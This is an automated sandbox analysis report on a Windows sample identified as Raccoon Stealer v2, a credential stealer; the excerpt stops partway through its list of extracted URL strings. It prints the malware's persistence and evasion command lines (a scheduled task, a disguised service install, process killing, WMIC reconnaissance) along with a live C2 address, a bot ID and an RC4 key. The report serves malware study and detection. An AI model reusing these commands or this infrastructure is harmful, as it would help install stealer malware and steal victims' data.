Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
z5i6tLOUD0.exe

Overview

General Information

Sample Name:z5i6tLOUD0.exe
Analysis ID:701216
MD5:035a4f79912dd1710c6a24324dddbb0b
SHA1:dbd4c4612a7fb75a8ae23294072e398ed47552fd
SHA256:417ea3585515662a88109b63a6ef89ef4ea592c35c0774f4d605d736254d1b12
Tags:exeRecordBreaker
Infos:

Detection

Raccoon Stealer v2
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Yara detected Raccoon Stealer v2
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Query firmware table information (likely to detect VMs)
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Changes security center settings (notifications, updates, antivirus, firewall)
Obfuscated command line found
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Queries keyboard layouts
Found large amount of non-executed APIs
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Uses net.exe to stop services
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Uses taskkill to terminate processes
Queries disk information (often used to detect virtual machines)

Classification

Process Tree

  • System is w10x64
  • z5i6tLOUD0.exe (PID: 4928 cmdline: "C:\Users\user\Desktop\z5i6tLOUD0.exe" MD5: 035A4F79912DD1710C6A24324DDDBB0B)
    • cmd.exe (PID: 2224 cmdline: "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafdfnasia" /tr "'C:\Users\user\AppData\Roaming\cmd32.exe'" /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 5128 cmdline: schtasks /create /sc minute /mo 1 /tn "Nafdfnasia" /tr "'C:\Users\user\AppData\Roaming\cmd32.exe'" /f MD5: 15FF7D8324231381BAD48A052F85DF04)
    • cmd.exe (PID: 5368 cmdline: cmd" /c copy "C:\Users\user\Desktop\z5i6tLOUD0.exe" "C:\Users\user\AppData\Roaming\cmd32.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • vbc.exe (PID: 3244 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe MD5: B3A917344F5610BEEC562556F11300FA)
      • WerFault.exe (PID: 5356 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3244 -s 168 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WingFtpServer.exe (PID: 6120 cmdline: "C:\Users\user\AppData\Local\Temp\WingFtpServer.exe" MD5: CF0D1C650627BF796FDC7775FDECB2E0)
      • WingFtpServer.tmp (PID: 4228 cmdline: "C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmp" /SL5="$403E6,13223801,146432,C:\Users\user\AppData\Local\Temp\WingFtpServer.exe" MD5: 4137CF8E14B42B0E1C90AF7628E02978)
        • wns22DB.tmp (PID: 4880 cmdline: windowsnetservicehelpersetup.exe /S MD5: 2BEB8722EA464A6FFB7AE6DC1FE00EF7)
          • net.exe (PID: 4856 cmdline: "net" stop windowsnetservicehelper.exe MD5: DD0561156F62BC1958CE0E370B23711B)
            • conhost.exe (PID: 4948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • net1.exe (PID: 4884 cmdline: C:\Windows\system32\net1 stop windowsnetservicehelper.exe MD5: B5A26C2BF17222E86B91D26F1247AF3E)
          • taskkill.exe (PID: 5316 cmdline: "taskkill" /IM windowsnetservicehelper.exe /T /F MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
            • conhost.exe (PID: 5328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 2852 cmdline: "sc" delete windowsnetservicehelper.exe MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 2744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • windowsnetservicehelper.exe (PID: 4864 cmdline: "windowsnetservicehelper.exe" install MD5: C48855FE677EB4D5C999C01ECCFDB0BC)
            • conhost.exe (PID: 2684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • windowsnetservicehelper.exe (PID: 3252 cmdline: "windowsnetservicehelper.exe" start MD5: C48855FE677EB4D5C999C01ECCFDB0BC)
            • conhost.exe (PID: 5184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • BackgroundTransferHost.exe (PID: 2224 cmdline: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1 MD5: 02BA81746B929ECC9DB6665589B68335)
  • svchost.exe (PID: 3448 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3804 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 5600 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 2356 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3076 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6088 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 5336 cmdline: c:\windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4756 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • windowsnetservicehelper.exe (PID: 4768 cmdline: C:\Program Files (x86)\WindowsNetService\windowsnetservicehelper.exe MD5: C48855FE677EB4D5C999C01ECCFDB0BC)
    • node.exe (PID: 2116 cmdline: C:\Program Files (x86)\WindowsNetService\node.exe" "C:\Program Files (x86)\WindowsNetService\service.js MD5: 5F40521D2E1082FE1C734610C4A83911)
      • conhost.exe (PID: 4688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • WMIC.exe (PID: 4708 cmdline: wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
        • conhost.exe (PID: 4948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • WMIC.exe (PID: 1328 cmdline: wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
        • conhost.exe (PID: 4968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • WMIC.exe (PID: 2120 cmdline: wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
        • conhost.exe (PID: 1276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • WMIC.exe (PID: 3424 cmdline: wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
        • conhost.exe (PID: 4444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • WMIC.exe (PID: 3108 cmdline: wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
        • conhost.exe (PID: 1952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • WMIC.exe (PID: 4116 cmdline: wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
        • conhost.exe (PID: 4264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • WMIC.exe (PID: 496 cmdline: wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
        • conhost.exe (PID: 5912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • WMIC.exe (PID: 4880 cmdline: wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
        • conhost.exe (PID: 4896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 4008 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4584 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Raccoon

{"C2 url": ["http://146.19.173.87"], "Bot ID": "5e2fe6baf8e8ce7099f065b350664b82", "RC4_key1": "5e2fe6baf8e8ce7099f065b350664b82"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.315220700.0000000003E31000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    0.2.z5i6tLOUD0.exe.3e45fd0.0.unpackJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
      7.0.vbc.exe.43a0000.0.unpackJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
        0.2.z5i6tLOUD0.exe.3e45fd0.0.raw.unpackJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpAvira: detection malicious, Label: TR/Dropper.Gen
          Multi AV Scanner detection for submitted file
          Source: z5i6tLOUD0.exeReversingLabs: Detection: 60%
          Source: z5i6tLOUD0.exeVirustotal: Detection: 28%Perma Link
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\WingFtpServer.exeReversingLabs: Detection: 17%
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpReversingLabs: Detection: 33%
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpReversingLabs: Detection: 15%
          Source: C:\Users\user\AppData\Roaming\cmd32.exeReversingLabs: Detection: 60%
          Machine Learning detection for sample
          Source: z5i6tLOUD0.exeJoe Sandbox ML: detected
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Roaming\cmd32.exeJoe Sandbox ML: detected
          Source: 18.0.WingFtpServer.tmp.400000.0.unpackAvira: Label: TR/Dropper.Gen
          Source: 00000000.00000002.315220700.0000000003E31000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Raccoon {"C2 url": ["http://146.19.173.87"], "Bot ID": "5e2fe6baf8e8ce7099f065b350664b82", "RC4_key1": "5e2fe6baf8e8ce7099f065b350664b82"}
          Source: z5i6tLOUD0.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: z5i6tLOUD0.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: WaaSMedicSvc.pdb source: waasmedic.20220912_171757_809.etl.16.dr
          Source: Binary string: c:\ws\out\Release\node.pdb source: node.exe, 00000022.00000002.604744457.0000000001801000.00000040.00000001.01000000.0000000E.sdmp
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpFile opened: C:\Users\userJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03AAD434 FindFirstFileW,FindClose,18_2_03AAD434
          Source: C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmpCode function: 18_2_03AACE68 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,18_2_03AACE68
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpCode function: 20_2_0040672B FindFirstFileW,FindClose,20_2_0040672B
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpCode function: 20_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,20_2_00405AFA
          Source: C:\Users\user\AppData\Local\Temp\wns22DB.tmpCode function: 20_2_00402868 FindFirstFileW,20_2_00402868

          Networking

          barindex
          Uses known network protocols on non-standard ports
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 6101
          Source: unknownNetwork traffic detected: HTTP traffic on port 6101 -> 49753
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: http://146.19.173.87
          Source: global trafficHTTP traffic detected: GET /strvn HTTP/1.1Sec-WebSocket-Version: 13Sec-WebSocket-Key: 6vBj9xxRPKmrnN/oh+G2pw==Connection: UpgradeUpgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: register.starhome.io:6101
          Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
          Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
          Source: global trafficTCP traffic: 192.168.2.6:49753 -> 142.93.96.73:6101
          Source: node.exe, 00000022.00000003.413774747.0000000003565000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000003.516616264.000000002F380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://api.infoip.io/ip
          Source: node.exe, 00000022.00000003.516616264.000000002F380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://api.infoip.io/ip9
          Source: node.exe, 00000022.00000003.413774747.0000000003565000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000003.516616264.000000002F380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
          Source: node.exe, 00000022.00000003.516616264.000000002F380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/9
          Source: node.exe, 00000022.00000003.413774747.0000000003565000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/H
          Source: z5i6tLOUD0.exe, 00000000.00000002.391081901.000000000C3DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
          Source: z5i6tLOUD0.exe, 00000000.00000002.391081901.000000000C3DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
          Source: node.exe, 00000022.00000003.413774747.0000000003565000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000003.516616264.000000002F380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://checkip.amazonaws.com/
          Source: node.exe, 00000022.00000003.516616264.000000002F380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://checkip.amazonaws.com/9
          Source: node.exe, 00000022.00000002.614463630.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
          Source: node.exe, 00000022.00000002.615283149.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000002.614463630.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: node.exe, 00000022.00000002.616216633.0000000003532000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000002.613801103.00000000032C0000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000003.533201185.0000000003532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
          Source: node.exe, 00000022.00000002.614463630.0000000003361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
          Source: node.exe, 00000022.00000002.614186818.0000000003317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl
          Source: node.exe, 00000022.00000002.616216633.0000000003532000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000003.533201185.0000000003532000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.544706692.0000015A138E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: node.exe, 00000022.00000002.614186818.0000000003317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl7
          Source: node.exe, 00000022.00000002.616216633.0000000003532000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000002.615283149.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000003.533201185.0000000003532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl
          Source: node.exe, 00000022.00000002.616216633.0000000003532000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000003.533201185.0000000003532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crlWf
          Source: node.exe, 00000022.00000002.615283149.00000000034C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crlp
          Source: node.exe, 00000022.00000002.614186818.0000000003317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl
          Source: node.exe, 00000022.00000002.616216633.0000000003532000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000003.533201185.0000000003532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
          Source: node.exe, 00000022.00000002.614186818.0000000003317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crlgP
          Source: node.exe, 00000022.00000002.614186818.0000000003317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl
          Source: node.exe, 00000022.00000002.616216633.0000000003532000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000003.533201185.0000000003532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
          Source: node.exe, 00000022.00000002.614186818.0000000003317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crlop
          Source: svchost.exe, 00000031.00000002.544706692.0000015A138E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
          Source: node.exe, 00000022.00000002.614186818.0000000003317000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
          Source: node.exe, 00000022.00000002.616216633.0000000003532000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000003.533201185.0000000003532000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
          Source: z5i6tLOUD0.exe, 00000000.00000002.391081901.000000000C3DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
          Source: z5i6tLOUD0.exe, 00000000.00000002.391081901.000000000C3DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
          Source: svchost.exe, 00000031.00000003.501712973.0000015A14185000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://help.disneyplus.com.
          Source: node.exe, 00000022.00000003.413774747.0000000003565000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000003.516616264.000000002F380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com/
          Source: node.exe, 00000022.00000003.516616264.000000002F380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com/9
          Source: node.exe, 00000022.00000003.413774747.0000000003565000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ident.me/4
          Source: node.exe, 00000022.00000003.516616264.000000002F380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ident.me/9
          Source: node.exe, 00000022.00000003.413774747.0000000003565000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000003.516616264.000000002F380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ifconfig.co/ip
          Source: node.exe, 00000022.00000003.516616264.000000002F380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ifconfig.co/ip9
          Source: node.exe, 00000022.00000003.413774747.0000000003565000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000003.516616264.000000002F380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ifconfig.io/ip
          Source: node.exe, 00000022.00000003.413774747.0000000003565000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ifconfig.io/ip0
          Source: node.exe, 00000022.00000003.516616264.000000002F380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ifconfig.io/ip9
          Source: node.exe, 00000022.00000003.413774747.0000000003565000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000003.516616264.000000002F380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ifconfig.me/ip
          Source: node.exe, 00000022.00000003.516616264.000000002F380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ifconfig.me/ip9
          Source: node.exe, 00000022.00000003.413774747.0000000003565000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=query
          Source: node.exe, 00000022.00000003.413774747.0000000003565000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=query$
          Source: node.exe, 00000022.00000003.516616264.000000002F380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=query9
          Source: node.exe, 00000022.00000003.413774747.0000000003565000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000003.516616264.000000002F380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ipecho.net/plain
          Source: node.exe, 00000022.00000003.516616264.000000002F380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ipecho.net/plain9
          Source: node.exe, 00000022.00000003.413774747.0000000003565000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ipecho.net/plainD
          Source: node.exe, 00000022.00000003.413774747.0000000003565000.00000004.00000800.00020000.00000000.sdmp, node.exe, 00000022.00000003.516616264.000000002F380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ipinfo.io/ip
          Source: node.exe, 00000022.00000003.413774747.0000000003565000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ipinfo.io/ip(
          Source: node.exe, 00000022.00000003.516616264.000000002F380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ipinfo.io/ip9
          Source: WingFtpServer.exe, 0000000E.00000003.307414709.0000000002340000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.exe, 0000000E.00000002.555929864.00000000009CC000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.exe, 0000000E.00000002.553557875.0000000000977000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.tmp, 00000012.00000002.556447653.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.tmp, 00000012.00000002.556863899.0000000002BB4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ispp.sourceforge.net/
          Source: WingFtpServer.exe, 0000000E.00000003.307414709.0000000002340000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.exe, 0000000E.00000002.553557875.0000000000977000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.tmp, 00000012.00000002.556863899.0000000002BB4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ispp.sourceforge.net/$
          Source: WingFtpServer.exe, 0000000E.00000003.307414709.0000000002340000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.exe, 0000000E.00000002.553557875.0000000000977000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.tmp, 00000012.00000002.556863899.0000000002BB4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ispp.sourceforge.net/About
          Source: WingFtpServer.exe, 0000000E.00000003.307414709.0000000002340000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.exe, 0000000E.00000002.553557875.0000000000977000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.tmp, 00000012.00000002.556863899.0000000002BB4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ispp.sourceforge.net/Acerca
          Source: WingFtpServer.exe, 0000000E.00000003.307414709.0000000002340000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.exe, 0000000E.00000002.553557875.0000000000977000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.tmp, 00000012.00000002.556863899.0000000002BB4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ispp.sourceforge.net/Despre
          Source: WingFtpServer.exe, 0000000E.00000003.307414709.0000000002340000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.exe, 0000000E.00000002.553557875.0000000000977000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.tmp, 00000012.00000002.556863899.0000000002BB4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ispp.sourceforge.net/Informazioni
          Source: WingFtpServer.exe, 0000000E.00000003.307414709.0000000002340000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.exe, 0000000E.00000002.553557875.0000000000977000.00000004.00001000.00020000.00000000.sdmp, WingFtpServer.tmp, 00000012.00000002.556863899.0000000002BB4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ispp.sourceforge.net/Kur
